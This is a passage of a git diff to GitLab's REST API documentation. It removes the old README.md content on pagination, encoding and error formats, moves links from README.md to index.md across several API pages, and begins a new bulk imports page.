offset pagination. - -### Offset-based pagination - -Sometimes, the returned result spans many pages. When listing resources, you can -pass the following parameters: - -| Parameter | Description | -|------------|-------------| -| `page` | Page number (default: `1`). | -| `per_page` | Number of items to list per page (default: `20`, max: `100`). | - -In the following example, we list 50 [namespaces](namespaces.md) per page: - -```shell -curl --request PUT --header "PRIVATE-TOKEN: <your_access_token>" "https://gitlab.example.com/api/v4/namespaces?per_page=50" -``` - -#### Pagination `Link` header - -[`Link` headers](https://www.w3.org/wiki/LinkHeader) are returned with each -response. They have `rel` set to `prev`, `next`, `first`, or `last` and contain -the relevant URL. Be sure to use these links instead of generating your own URLs. - -For GitLab.com users, [some pagination headers may not be returned](../user/gitlab_com/index.md#pagination-response-headers). - -In the following cURL example, we limit the output to three items per page -(`per_page=3`) and we request the second page (`page=2`) of [comments](notes.md) -of the issue with ID `8` which belongs to the project with ID `9`: - -```shell -curl --head --header "PRIVATE-TOKEN: <your_access_token>" "https://gitlab.example.com/api/v4/projects/9/issues/8/notes?per_page=3&page=2" -``` - -The response is: - -```http -HTTP/2 200 OK -cache-control: no-cache -content-length: 1103 -content-type: application/json -date: Mon, 18 Jan 2016 09:43:18 GMT -link: <https://gitlab.example.com/api/v4/projects/8/issues/8/notes?page=1&per_page=3>; rel="prev", <https://gitlab.example.com/api/v4/projects/8/issues/8/notes?page=3&per_page=3>; rel="next", <https://gitlab.example.com/api/v4/projects/8/issues/8/notes?page=1&per_page=3>; rel="first", <https://gitlab.example.com/api/v4/projects/8/issues/8/notes?page=3&per_page=3>; rel="last" -status: 200 OK -vary: Origin -x-next-page: 3 -x-page: 2 -x-per-page: 3 -x-prev-page: 1 -x-request-id: 732ad4ee-9870-4866-a199-a9db0cde3c86 -x-runtime: 0.108688 -x-total: 8 -x-total-pages: 3 -``` - -#### Other pagination headers - -GitLab also returns the following additional pagination headers: - -| Header | Description | -|-----------------|-------------| -| `x-next-page` | The index of the next page. | -| `x-page` | The index of the current page (starting at 1). | -| `x-per-page` | The number of items per page. | -| `X-prev-page` | The index of the previous page. | -| `x-total` | The total number of items. | -| `x-total-pages` | The total number of pages. | - -For GitLab.com users, [some pagination headers may not be returned](../user/gitlab_com/index.md#pagination-response-headers). - -### Keyset-based pagination - -Keyset-pagination allows for more efficient retrieval of pages and - in contrast -to offset-based pagination - runtime is independent of the size of the -collection. - -This method is controlled by the following parameters: - -| Parameter | Description | -|--------------| ------------| -| `pagination` | `keyset` (to enable keyset pagination). | -| `per_page` | Number of items to list per page (default: `20`, max: `100`). | - -In the following example, we list 50 [projects](projects.md) per page, ordered -by `id` ascending. - -```shell -curl --request GET --header "PRIVATE-TOKEN: <your_access_token>" "https://gitlab.example.com/api/v4/projects?pagination=keyset&per_page=50&order_by=id&sort=asc" -``` - -The response header includes a link to the next page. For example: - -```http -HTTP/1.1 200 OK -... -Links: <https://gitlab.example.com/api/v4/projects?pagination=keyset&per_page=50&order_by=id&sort=asc&id_after=42>; rel="next" -Link: <https://gitlab.example.com/api/v4/projects?pagination=keyset&per_page=50&order_by=id&sort=asc&id_after=42>; rel="next" -Status: 200 OK -... -``` - -WARNING: -The `Links` header is scheduled to be removed in GitLab 14.0 to be aligned with the -[W3C `Link` specification](https://www.w3.org/wiki/LinkHeader). The `Link` -header was [added in GitLab 13.1](https://gitlab.com/gitlab-org/gitlab/-/merge_requests/33714) -and should be used instead. - -The link to the next page contains an additional filter `id_after=42` that -excludes already-retrieved records. The type of filter depends on the -`order_by` option used, and we may have more than one additional filter. - -When the end of the collection is reached and there are no additional -records to retrieve, the `Link` header is absent and the resulting array is -empty. - -We recommend using only the given link to retrieve the next page instead of -building your own URL. Apart from the headers shown, we don't expose additional -pagination headers. - -Keyset-based pagination is supported only for selected resources and ordering -options: - -| Resource | Order | -|-------------------------|-------| -| [Projects](projects.md) | `order_by=id` only. | - -## Path parameters - -If an endpoint has path parameters, the documentation displays them with a -preceding colon. - -For example: - -```plaintext -DELETE /projects/:id/share/:group_id -``` - -The `:id` path parameter needs to be replaced with the project ID, and the -`:group_id` needs to be replaced with the ID of the group. The colons `:` -shouldn't be included. - -The resulting cURL request for a project with ID `5` and a group ID of `17` is then: - -```shell -curl --request DELETE --header "PRIVATE-TOKEN: <your_access_token>" "https://gitlab.example.com/api/v4/projects/5/share/17" -``` - -Path parameters that are required to be URL-encoded must be followed. If not, -it doesn't match an API endpoint and responds with a 404. If there's -something in front of the API (for example, Apache), ensure that it doesn't decode -the URL-encoded path parameters. - -## Namespaced path encoding - -If using namespaced API requests, make sure that the `NAMESPACE/PROJECT_PATH` is -URL-encoded. - -For example, `/` is represented by `%2F`: - -```plaintext -GET /api/v4/projects/diaspora%2Fdiaspora -``` - -A project's _path_ isn't necessarily the same as its _name_. A project's path is -found in the project's URL or in the project's settings, under -**General > Advanced > Change path**. - -## File path, branches, and tags name encoding - -If a file path, branch or tag contains a `/`, make sure it is URL-encoded. - -For example, `/` is represented by `%2F`: - -```plaintext -GET /api/v4/projects/1/repository/files/src%2FREADME.md?ref=master -GET /api/v4/projects/1/branches/my%2Fbranch/commits -GET /api/v4/projects/1/repository/tags/my%2Ftag -``` - -## Request Payload - -API Requests can use parameters sent as [query strings](https://en.wikipedia.org/wiki/Query_string) -or as a [payload body](https://tools.ietf.org/html/draft-ietf-httpbis-p3-payload-14#section-3.2). -GET requests usually send a query string, while PUT or POST requests usually -send the payload body: - -- Query string: - - ```shell - curl --request POST "https://gitlab/api/v4/projects?name=<example-name>&description=<example-description>" - ``` - -- Request payload (JSON): - - ```shell - curl --request POST --header "Content-Type: application/json" \ - --data '{"name":"<example-name>", "description":"<example-description"}' "https://gitlab/api/v4/projects" - ``` - -URL encoded query strings have a length limitation. Requests that are too large -result in a `414 Request-URI Too Large` error message. This can be resolved by -using a payload body instead. - -## Encoding API parameters of `array` and `hash` types - -You can request the API with `array` and `hash` types parameters: - -### `array` - -`import_sources` is a parameter of type `array`: - -```shell -curl --request POST --header "PRIVATE-TOKEN: <your_access_token>" \ --d "import_sources[]=github" \ --d "import_sources[]=bitbucket" \ -"https://gitlab.example.com/api/v4/some_endpoint" -``` - -### `hash` - -`override_params` is a parameter of type `hash`: - -```shell -curl --request POST --header "PRIVATE-TOKEN: <your_access_token>" \ ---form "namespace=email" \ ---form "path=impapi" \ ---form "file=@/path/to/somefile.txt" ---form "override_params[visibility]=private" \ ---form "override_params[some_other_param]=some_value" \ -"https://gitlab.example.com/api/v4/projects/import" -``` - -### Array of hashes - -`variables` is a parameter of type `array` containing hash key/value pairs -`[{ 'key': 'UPLOAD_TO_S3', 'value': 'true' }]`: - -```shell -curl --globoff --request POST --header "PRIVATE-TOKEN: <your_access_token>" \ -"https://gitlab.example.com/api/v4/projects/169/pipeline?ref=master&variables[][key]=VAR1&variables[][value]=hello&variables[][key]=VAR2&variables[][value]=world" - -curl --request POST --header "PRIVATE-TOKEN: <your_access_token>" \ ---header "Content-Type: application/json" \ ---data '{ "ref": "master", "variables": [ {"key": "VAR1", "value": "hello"}, {"key": "VAR2", "value": "world"} ] }' \ -"https://gitlab.example.com/api/v4/projects/169/pipeline" -``` - -## `id` vs `iid` - -Some resources have two similarly-named fields. For example, [issues](issues.md), -[merge requests](merge_requests.md), and [project milestones](merge_requests.md). -The fields are: - -- `id`: ID that is unique across all projects. -- `iid`: Additional, internal ID (displayed in the web UI) that's unique in the - scope of a single project. - -If a resource has both the `iid` field and the `id` field, the `iid` field is -usually used instead of `id` to fetch the resource. - -For example, suppose a project with `id: 42` has an issue with `id: 46` and -`iid: 5`. In this case: - -- A valid API request to retrieve the issue is `GET /projects/42/issues/5`. -- An invalid API request to retrieve the issue is `GET /projects/42/issues/46`. - -Not all resources with the `iid` field are fetched by `iid`. For guidance -regarding which field to use, see the documentation for the specific resource. - -## Data validation and error reporting - -When working with the API you may encounter validation errors, in which case -the API returns an HTTP `400` error. - -Such errors appear in the following cases: - -- A required attribute of the API request is missing (for example, the title of - an issue isn't given). -- An attribute did not pass the validation (for example, the user bio is too - long). - -When an attribute is missing, you receive something like: - -```http -HTTP/1.1 400 Bad Request -Content-Type: application/json -{ - "message":"400 (Bad request) \"title\" not given" -} -``` - -When a validation error occurs, error messages are different. They hold -all details of validation errors: - -```http -HTTP/1.1 400 Bad Request -Content-Type: application/json -{ - "message": { - "bio": [ - "is too long (maximum is 255 characters)" - ] - } -} -``` - -This makes error messages more machine-readable. The format can be described as -follows: - -```json -{ - "message": { - "<property-name>": [ - "<error-message>", - "<error-message>", - ... - ], - "<embed-entity>": { - "<property-name>": [ - "<error-message>", - "<error-message>", - ... - ], - } - } -} -``` - -## Unknown route - -When you attempt to access an API URL that doesn't exist, you receive a -404 Not Found message. - -```http -HTTP/1.1 404 Not Found -Content-Type: application/json -{ - "error": "404 Not Found" -} -``` - -## Encoding `+` in ISO 8601 dates - -If you need to include a `+` in a query parameter, you may need to use `%2B` -instead, due to a [W3 recommendation](http://www.w3.org/Addressing/URL/4_URI_Recommentations.html) -that causes a `+` to be interpreted as a space. For example, in an ISO 8601 date, -you may want to include a specific time in ISO 8601 format, such as: - -```plaintext -2017-10-17T23:11:13.000+05:30 -``` - -The correct encoding for the query parameter would be: - -```plaintext -2017-10-17T23:11:13.000%2B05:30 -``` - -## Clients - -There are many unofficial GitLab API Clients for most of the popular programming -languages. For a complete list, visit the [GitLab website](https://about.gitlab.com/partners/technology-partners/#api-clients). - -## Rate limits - -For administrator documentation on rate limit settings, see -[Rate limits](../security/rate_limits.md). To find the settings that are -specifically used by GitLab.com, see -[GitLab.com-specific rate limits](../user/gitlab_com/index.md#gitlabcom-specific-rate-limits). - -## Content type - -The GitLab API supports the `application/json` content type by default, though -some API endpoints also support `text/plain`. - -In [GitLab 13.10 and later](https://gitlab.com/gitlab-org/gitlab/-/issues/250342), -API endpoints do not support `text/plain` by default, unless it's explicitly documented. +<!-- This redirect file can be deleted after 2021-09-28. --> +<!-- Before deletion, see: https://docs.gitlab.com/ee/development/documentation/#move-or-rename-a-page --> diff --git a/doc/api/access_requests.md b/doc/api/access_requests.md index db68c140ae6..8ef3e882209 100644 --- a/doc/api/access_requests.md +++ b/doc/api/access_requests.md @@ -33,7 +33,7 @@ GET /projects/:id/access_requests | Attribute | Type | Required | Description | | --------- | -------------- | -------- | ----------- | -| `id` | integer/string | yes | The ID or [URL-encoded path of the project](README.md#namespaced-path-encoding) owned by the authenticated user | +| `id` | integer/string | yes | The ID or [URL-encoded path of the project](index.md#namespaced-path-encoding) owned by the authenticated user | Example request: @@ -76,7 +76,7 @@ POST /projects/:id/access_requests | Attribute | Type | Required | Description | | --------- | -------------- | -------- | ----------- | -| `id` | integer/string | yes | The ID or [URL-encoded path of the project](README.md#namespaced-path-encoding) owned by the authenticated user | +| `id` | integer/string | yes | The ID or [URL-encoded path of the project](index.md#namespaced-path-encoding) owned by the authenticated user | Example request: @@ -109,9 +109,9 @@ PUT /projects/:id/access_requests/:user_id/approve | Attribute | Type | Required | Description | | -------------- | -------------- | -------- | ----------- | -| `id` | integer/string | yes | The ID or [URL-encoded path of the project](README.md#namespaced-path-encoding) owned by the authenticated user | +| `id` | integer/string | yes | The ID or [URL-encoded path of the project](index.md#namespaced-path-encoding) owned by the authenticated user | | `user_id` | integer | yes | The user ID of the access requester | -| `access_level` | integer | no | A valid access level (defaults: `30`, developer access level) | +| `access_level` | integer | no | A valid access level (defaults: `30`, the Developer role) | Example request: @@ -144,7 +144,7 @@ DELETE /projects/:id/access_requests/:user_id | Attribute | Type | Required | Description | | --------- | -------------- | -------- | ----------- | -| `id` | integer/string | yes | The ID or [URL-encoded path of the project](README.md#namespaced-path-encoding) owned by the authenticated user | +| `id` | integer/string | yes | The ID or [URL-encoded path of the project](index.md#namespaced-path-encoding) owned by the authenticated user | | `user_id` | integer | yes | The user ID of the access requester | Example request: diff --git a/doc/api/api_resources.md b/doc/api/api_resources.md index 9200d47effe..6c9baab83e9 100644 --- a/doc/api/api_resources.md +++ b/doc/api/api_resources.md @@ -4,9 +4,9 @@ group: Ecosystem info: To determine the technical writer assigned to the Stage/Group associated with this page, see https://about.gitlab.com/handbook/engineering/ux/technical-writing/#assignments --- -# API resources **(FREE)** +# REST API resources **(FREE)** -Available resources for the [GitLab API](README.md) can be grouped in the following contexts: +Available resources for the [GitLab REST API](index.md) can be grouped in the following contexts: - [Projects](#project-resources). - [Groups](#group-resources). @@ -34,6 +34,7 @@ The following API resources are available in the project context: | [Dependencies](dependencies.md) **(ULTIMATE)** | `/projects/:id/dependencies` | | [Deploy keys](deploy_keys.md) | `/projects/:id/deploy_keys` (also available standalone) | | [Freeze Periods](freeze_periods.md) | `/projects/:id/freeze_periods` | +| [Debian distributions](packages/debian_project_distributions.md) | `/projects/:id/debian_distributions` (also available for groups) | | [Deployments](deployments.md) | `/projects/:id/deployments` | | [Discussions](discussions.md) (threaded comments) | `/projects/:id/issues/.../discussions`, `/projects/:id/snippets/.../discussions`, `/projects/:id/merge_requests/.../discussions`, `/projects/:id/commits/.../discussions` (also available for groups) | | [Environments](environments.md) | `/projects/:id/environments` | @@ -99,6 +100,7 @@ The following API resources are available in the group context: |:-----------------------------------------------------------------|:---------------------------------------------------------------------------------| | [Access requests](access_requests.md) | `/groups/:id/access_requests/` (also available for projects) | | [Custom attributes](custom_attributes.md) | `/groups/:id/custom_attributes` (also available for projects and users) | +| [Debian distributions](packages/debian_group_distributions.md) | `/groups/:id/-/packages/debian` (also available for projects) | | [Discussions](discussions.md) (threaded comments) **(ULTIMATE)** | `/groups/:id/epics/.../discussions` (also available for projects) | | [Epic issues](epic_issues.md) **(ULTIMATE)** | `/groups/:id/epics/.../issues` | | [Epic links](epic_links.md) **(ULTIMATE)** | `/groups/:id/epics/.../epics` | @@ -168,7 +170,7 @@ The following API resources are available outside of project and group contexts | [Suggestions](suggestions.md) | `/suggestions` | | [System hooks](system_hooks.md) | `/hooks` | | [To-dos](todos.md) | `/todos` | -| [Usage data](usage_data.md) | `/usage_data` (For GitLab instance [Administrator](../user/permissions.md) users only) | +| [Service Data](usage_data.md) | `/usage_data` (For GitLab instance [Administrator](../user/permissions.md) users only) | | [Users](users.md) | `/users` | | [Validate `.gitlab-ci.yml` file](lint.md) | `/lint` | | [Version](version.md) | `/version` | diff --git a/doc/api/audit_events.md b/doc/api/audit_events.md index dec2b85c61d..8fbee89f9be 100644 --- a/doc/api/audit_events.md +++ b/doc/api/audit_events.md @@ -4,7 +4,7 @@ group: Compliance info: To determine the technical writer assigned to the Stage/Group associated with this page, see https://about.gitlab.com/handbook/engineering/ux/technical-writing/#assignments --- -# Audit Events API +# Audit Events API **(PREMIUM)** > [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/121) in GitLab 12.4. @@ -13,7 +13,7 @@ info: To determine the technical writer assigned to the Stage/Group associated w The Audit Events API allows you to retrieve [instance audit events](../administration/audit_events.md#instance-events). This API cannot retrieve group or project audit events. -To retrieve audit events using the API, you must [authenticate yourself](README.md#authentication) as an Administrator. +To retrieve audit events using the API, you must [authenticate yourself](index.md#authentication) as an Administrator. ### Retrieve all instance audit events @@ -31,7 +31,7 @@ GET /audit_events By default, `GET` requests return 20 results at a time because the API results are paginated. -Read more on [pagination](README.md#pagination). +Read more on [pagination](index.md#pagination). ```shell curl --header "PRIVATE-TOKEN: <your_access_token>" "https://primary.example.com/api/v4/audit_events" @@ -129,7 +129,7 @@ Example response: } ``` -## Group Audit Events **(PREMIUM)** +## Group Audit Events > [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/34078) in GitLab 12.5. @@ -147,14 +147,14 @@ GET /groups/:id/audit_events | Attribute | Type | Required | Description | | --------- | ---- | -------- | ----------- | -| `id` | integer/string | yes | The ID or [URL-encoded path of the group](README.md#namespaced-path-encoding) | +| `id` | integer/string | yes | The ID or [URL-encoded path of the group](index.md#namespaced-path-encoding) | | `created_after` | string | no | Return group audit events created on or after the given time. Format: ISO 8601 YYYY-MM-DDTHH:MM:SSZ | | `created_before` | string | no | Return group audit events created on or before the given time. Format: ISO 8601 YYYY-MM-DDTHH:MM:SSZ | By default, `GET` requests return 20 results at a time because the API results are paginated. -Read more on [pagination](README.md#pagination). +Read more on [pagination](index.md#pagination). ```shell curl --header "PRIVATE-TOKEN: <your_access_token>" "https://primary.example.com/api/v4/groups/60/audit_events" @@ -209,7 +209,7 @@ GET /groups/:id/audit_events/:audit_event_id | Attribute | Type | Required | Description | | --------- | ---- | -------- | ----------- | -| `id` | integer/string | yes | The ID or [URL-encoded path of the group](README.md#namespaced-path-encoding) | +| `id` | integer/string | yes | The ID or [URL-encoded path of the group](index.md#namespaced-path-encoding) | | `audit_event_id` | integer | yes | The ID of the audit event | ```shell @@ -237,7 +237,7 @@ Example response: } ``` -## Project Audit Events **(PREMIUM)** +## Project Audit Events > [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/219238) in GitLab 13.1. @@ -254,14 +254,14 @@ GET /projects/:id/audit_events | Attribute | Type | Required | Description | | --------- | ---- | -------- | ----------- | -| `id` | integer/string | yes | The ID or [URL-encoded path of the project](README.md#namespaced-path-encoding) | +| `id` | integer/string | yes | The ID or [URL-encoded path of the project](index.md#namespaced-path-encoding) | | `created_after` | string | no | Return project audit events created on or after the given time. Format: ISO 8601 YYYY-MM-DDTHH:MM:SSZ | | `created_before` | string | no | Return project audit events created on or before the given time. Format: ISO 8601 YYYY-MM-DDTHH:MM:SSZ | By default, `GET` requests return 20 results at a time because the API results are paginated. -Read more on [pagination](README.md#pagination). +Read more on [pagination](index.md#pagination). ```shell curl --header "PRIVATE-TOKEN: <your_access_token>" "https://primary.example.com/api/v4/projects/7/audit_events" @@ -320,7 +320,7 @@ GET /projects/:id/audit_events/:audit_event_id | Attribute | Type | Required | Description | | --------- | ---- | -------- | ----------- | -| `id` | integer/string | yes | The ID or [URL-encoded path of the project](README.md#namespaced-path-encoding) | +| `id` | integer/string | yes | The ID or [URL-encoded path of the project](index.md#namespaced-path-encoding) | | `audit_event_id` | integer | yes | The ID of the audit event | ```shell diff --git a/doc/api/award_emoji.md b/doc/api/award_emoji.md index 32ac6ef26ea..dc3dc9fcaca 100644 --- a/doc/api/award_emoji.md +++ b/doc/api/award_emoji.md @@ -4,9 +4,7 @@ group: Project Management info: To determine the technical writer assigned to the Stage/Group associated with this page, see https://about.gitlab.com/handbook/engineering/ux/technical-writing/#assignments --- -# Award Emoji API - -> [Introduced](https://gitlab.com/gitlab-org/gitlab-foss/-/merge_requests/4575) in GitLab 8.9. Snippet support added in 8.12. +# Award emoji API **(FREE)** An [awarded emoji](../user/award_emojis.md) tells a thousand words. @@ -37,7 +35,7 @@ Parameters: | Attribute | Type | Required | Description | |:---------------|:---------------|:---------|:-----------------------------------------------------------------------------| -| `id` | integer/string | yes | ID or [URL-encoded path of the project](README.md#namespaced-path-encoding). | +| `id` | integer/string | yes | ID or [URL-encoded path of the project](index.md#namespaced-path-encoding). | | `issue_iid`/`merge_request_iid`/`snippet_id` | integer | yes | ID (`iid` for merge requests/issues, `id` for snippets) of an awardable. | Example request: @@ -99,7 +97,7 @@ Parameters: | Attribute | Type | Required | Description | |:---------------|:---------------|:---------|:-----------------------------------------------------------------------------| -| `id` | integer/string | yes | ID or [URL-encoded path of the project](README.md#namespaced-path-encoding). | +| `id` | integer/string | yes | ID or [URL-encoded path of the project](index.md#namespaced-path-encoding). | | `issue_iid`/`merge_request_iid`/`snippet_id` | integer | yes | ID (`iid` for merge requests/issues, `id` for snippets) of an awardable. | | `award_id` | integer | yes | ID of the award emoji. | @@ -144,7 +142,7 @@ Parameters: | Attribute | Type | Required | Description | |:---------------|:---------------|:---------|:-----------------------------------------------------------------------------| -| `id` | integer/string | yes | ID or [URL-encoded path of the project](README.md#namespaced-path-encoding). | +| `id` | integer/string | yes | ID or [URL-encoded path of the project](index.md#namespaced-path-encoding). | | `issue_iid`/`merge_request_iid`/`snippet_id` | integer | yes | ID (`iid` for merge requests/issues, `id` for snippets) of an awardable. | | `name` | string | yes | Name of the emoji without colons. | @@ -189,7 +187,7 @@ Parameters: | Attribute | Type | Required | Description | |:---------------|:---------------|:---------|:-----------------------------------------------------------------------------| -| `id` | integer/string | yes | ID or [URL-encoded path of the project](README.md#namespaced-path-encoding). | +| `id` | integer/string | yes | ID or [URL-encoded path of the project](index.md#namespaced-path-encoding). | | `issue_iid`/`merge_request_iid`/`snippet_id` | integer | yes | ID (`iid` for merge requests/issues, `id` for snippets) of an awardable. | | `award_id` | integer | yes | ID of an award emoji. | @@ -218,7 +216,7 @@ Parameters: | Attribute | Type | Required | Description | |:------------|:---------------|:---------|:-----------------------------------------------------------------------------| -| `id` | integer/string | yes | ID or [URL-encoded path of the project](README.md#namespaced-path-encoding). | +| `id` | integer/string | yes | ID or [URL-encoded path of the project](index.md#namespaced-path-encoding). | | `issue_iid` | integer | yes | Internal ID of an issue. | | `note_id` | integer | yes | ID of a comment (note). | @@ -263,7 +261,7 @@ Parameters: | Attribute | Type | Required | Description | |:------------|:---------------|:---------|:-----------------------------------------------------------------------------| -| `id` | integer/string | yes | ID or [URL-encoded path of the project](README.md#namespaced-path-encoding). | +| `id` | integer/string | yes | ID or [URL-encoded path of the project](index.md#namespaced-path-encoding). | | `issue_iid` | integer | yes | Internal ID of an issue. | | `note_id` | integer | yes | ID of a comment (note). | | `award_id` | integer | yes | ID of the award emoji. | @@ -307,7 +305,7 @@ Parameters: | Attribute | Type | Required | Description | |:------------|:---------------|:---------|:-----------------------------------------------------------------------------| -| `id` | integer/string | yes | ID or [URL-encoded path of the project](README.md#namespaced-path-encoding). | +| `id` | integer/string | yes | ID or [URL-encoded path of the project](index.md#namespaced-path-encoding). | | `issue_iid` | integer | yes | Internal ID of an issue. | | `note_id` | integer | yes | ID of a comment (note). | | `name` | string | yes | Name of the emoji without colons. | @@ -353,7 +351,7 @@ Parameters: | Attribute | Type | Required | Description | |:------------|:---------------|:---------|:-----------------------------------------------------------------------------| -| `id` | integer/string | yes | ID or [URL-encoded path of the project](README.md#namespaced-path-encoding). | +| `id` | integer/string | yes | ID or [URL-encoded path of the project](index.md#namespaced-path-encoding). | | `issue_iid` | integer | yes | Internal ID of an issue. | | `note_id` | integer | yes | ID of a comment (note). | | `award_id` | integer | yes | ID of an award_emoji. | diff --git a/doc/api/boards.md b/doc/api/boards.md index 3cdd9552d66..3288aefb1cf 100644 --- a/doc/api/boards.md +++ b/doc/api/boards.md @@ -4,9 +4,9 @@ group: Project Management info: To determine the technical writer assigned to the Stage/Group associated with this page, see https://about.gitlab.com/handbook/engineering/ux/technical-writing/#assignments --- -# Project Issue Boards API +# Project issue boards API **(FREE)** -Every API call to boards must be authenticated. +Every API call to [issue boards](../user/project/issue_board.md) must be authenticated. If a user is not a member of a private project, a `GET` request on that project results in a `404` status code. @@ -21,7 +21,7 @@ GET /projects/:id/boards | Attribute | Type | Required | Description | | --------- | ---- | -------- | ----------- | -| `id` | integer/string | yes | The ID or [URL-encoded path of the project](README.md#namespaced-path-encoding) owned by the authenticated user | +| `id` | integer/string | yes | The ID or [URL-encoded path of the project](index.md#namespaced-path-encoding) owned by the authenticated user | ```shell curl --header "PRIVATE-TOKEN: <your_access_token>" "https://gitlab.example.com/api/v4/projects/5/boards" @@ -105,7 +105,7 @@ GET /projects/:id/boards/:board_id | Attribute | Type | Required | Description | | --------- | ---- | -------- | ----------- | -| `id` | integer/string | yes | The ID or [URL-encoded path of the project](README.md#namespaced-path-encoding) owned by the authenticated user | +| `id` | integer/string | yes | The ID or [URL-encoded path of the project](index.md#namespaced-path-encoding) owned by the authenticated user | | `board_id` | integer | yes | The ID of a board | ```shell @@ -182,7 +182,7 @@ POST /projects/:id/boards | Attribute | Type | Required | Description | | --------- | ---- | -------- | ----------- | -| `id` | integer/string | yes | The ID or [URL-encoded path of the project](README.md#namespaced-path-encoding) owned by the authenticated user | +| `id` | integer/string | yes | The ID or [URL-encoded path of the project](index.md#namespaced-path-encoding) owned by the authenticated user | | `name` | string | yes | The name of the new board | ```shell @@ -225,7 +225,7 @@ PUT /projects/:id/boards/:board_id | Attribute | Type | Required | Description | | ---------------------------- | -------------- | -------- | ----------- | -| `id` | integer/string | yes | The ID or [URL-encoded path of the project](README.md#namespaced-path-encoding) owned by the authenticated user | +| `id` | integer/string | yes | The ID or [URL-encoded path of the project](index.md#namespaced-path-encoding) owned by the authenticated user | | `board_id` | integer | yes | The ID of a board | | `name` | string | no | The new name of the board | | `assignee_id` **(PREMIUM)** | integer | no | The assignee the board should be scoped to | @@ -305,7 +305,7 @@ DELETE /projects/:id/boards/:board_id | Attribute | Type | Required | Description | | --------- | ---- | -------- | ----------- | -| `id` | integer/string | yes | The ID or [URL-encoded path of the project](README.md#namespaced-path-encoding) owned by the authenticated user | +| `id` | integer/string | yes | The ID or [URL-encoded path of the project](index.md#namespaced-path-encoding) owned by the authenticated user | | `board_id` | integer | yes | The ID of a board | ```shell @@ -323,7 +323,7 @@ GET /projects/:id/boards/:board_id/lists | Attribute | Type | Required | Description | | --------- | ---- | -------- | ----------- | -| `id` | integer/string | yes | The ID or [URL-encoded path of the project](README.md#namespaced-path-encoding) owned by the authenticated user | +| `id` | integer/string | yes | The ID or [URL-encoded path of the project](index.md#namespaced-path-encoding) owned by the authenticated user | | `board_id` | integer | yes | The ID of a board | ```shell @@ -383,7 +383,7 @@ GET /projects/:id/boards/:board_id/lists/:list_id | Attribute | Type | Required | Description | | --------- | ---- | -------- | ----------- | -| `id` | integer/string | yes | The ID or [URL-encoded path of the project](README.md#namespaced-path-encoding) owned by the authenticated user | +| `id` | integer/string | yes | The ID or [URL-encoded path of the project](index.md#namespaced-path-encoding) owned by the authenticated user | | `board_id` | integer | yes | The ID of a board | | `list_id`| integer | yes | The ID of a board's list | @@ -418,7 +418,7 @@ POST /projects/:id/boards/:board_id/lists | Attribute | Type | Required | Description | | --------- | ---- | -------- | ----------- | -| `id` | integer/string | yes | The ID or [URL-encoded path of the project](README.md#namespaced-path-encoding) owned by the authenticated user | +| `id` | integer/string | yes | The ID or [URL-encoded path of the project](index.md#namespaced-path-encoding) owned by the authenticated user | | `board_id` | integer | yes | The ID of a board | | `label_id` | integer | no | The ID of a label | | `assignee_id` **(PREMIUM)** | integer | no | The ID of a user | @@ -461,7 +461,7 @@ PUT /projects/:id/boards/:board_id/lists/:list_id | Attribute | Type | Required | Description | | --------- | ---- | -------- | ----------- | -| `id` | integer/string | yes | The ID or [URL-encoded path of the project](README.md#namespaced-path-encoding) owned by the authenticated user | +| `id` | integer/string | yes | The ID or [URL-encoded path of the project](index.md#namespaced-path-encoding) owned by the authenticated user | | `board_id` | integer | yes | The ID of a board | | `list_id` | integer | yes | The ID of a board's list | | `position` | integer | yes | The position of the list | @@ -497,7 +497,7 @@ DELETE /projects/:id/boards/:board_id/lists/:list_id | Attribute | Type | Required | Description | | --------- | ---- | -------- | ----------- | -| `id` | integer/string | yes | The ID or [URL-encoded path of the project](README.md#namespaced-path-encoding) owned by the authenticated user | +| `id` | integer/string | yes | The ID or [URL-encoded path of the project](index.md#namespaced-path-encoding) owned by the authenticated user | | `board_id` | integer | yes | The ID of a board | | `list_id` | integer | yes | The ID of a board's list | diff --git a/doc/api/branches.md b/doc/api/branches.md index 2fb9997bdca..15d1b6c2a18 100644 --- a/doc/api/branches.md +++ b/doc/api/branches.md @@ -26,7 +26,7 @@ Parameters: | Attribute | Type | Required | Description | |:----------|:---------------|:---------|:------------| -| `id` | integer/string | yes | ID or [URL-encoded path of the project](README.md#namespaced-path-encoding) owned by the authenticated user.| +| `id` | integer/string | yes | ID or [URL-encoded path of the project](index.md#namespaced-path-encoding) owned by the authenticated user.| | `search` | string | no | Return list of branches containing the search string. You can use `^term` and `term$` to find branches that begin and end with `term` respectively. | Example request: @@ -83,7 +83,7 @@ Parameters: | Attribute | Type | Required | Description | |:----------|:---------------|:---------|:-------------------------------------------------------------------------------------------------------------| -| `id` | integer/string | yes | ID or [URL-encoded path of the project](README.md#namespaced-path-encoding) owned by the authenticated user. | +| `id` | integer/string | yes | ID or [URL-encoded path of the project](index.md#namespaced-path-encoding) owned by the authenticated user. | | `branch` | string | yes | Name of the branch. | Example request: @@ -144,7 +144,7 @@ Parameters: | Attribute | Type | Required | Description | |:----------|:--------|:---------|:-------------------------------------------------------------------------------------------------------------| -| `id` | integer | yes | ID or [URL-encoded path of the project](README.md#namespaced-path-encoding) owned by the authenticated user. | +| `id` | integer | yes | ID or [URL-encoded path of the project](index.md#namespaced-path-encoding) owned by the authenticated user. | | `branch` | string | yes | Name of the branch. | | `ref` | string | yes | Branch name or commit SHA to create branch from. | @@ -199,7 +199,7 @@ Parameters: | Attribute | Type | Required | Description | |:----------|:---------------|:---------|:-------------------------------------------------------------------------------------------------------------| -| `id` | integer/string | yes | ID or [URL-encoded path of the project](README.md#namespaced-path-encoding) owned by the authenticated user. | +| `id` | integer/string | yes | ID or [URL-encoded path of the project](index.md#namespaced-path-encoding) owned by the authenticated user. | | `branch` | string | yes | Name of the branch. | Example request: @@ -223,7 +223,7 @@ Parameters: | Attribute | Type | Required | Description | |:----------|:---------------|:---------|:-------------------------------------------------------------------------------------------------------------| -| `id` | integer/string | yes | ID or [URL-encoded path of the project](README.md#namespaced-path-encoding) owned by the authenticated user. | +| `id` | integer/string | yes | ID or [URL-encoded path of the project](index.md#namespaced-path-encoding) owned by the authenticated user. | Example request: diff --git a/doc/api/bulk_imports.md b/doc/api/bulk_imports.md new file mode 100644 index 00000000000..9521c769d49 --- /dev/null +++ b/doc/api/bulk_imports.md @@ -0,0 +1,193 @@ +--- +stage: Manage +group: Import +info: To determine the technical writer assigned to the Stage/Group associated with this page, see https://about.gitlab.com/handbook/engineering/ux/technical-writing/#assignments +--- + +# 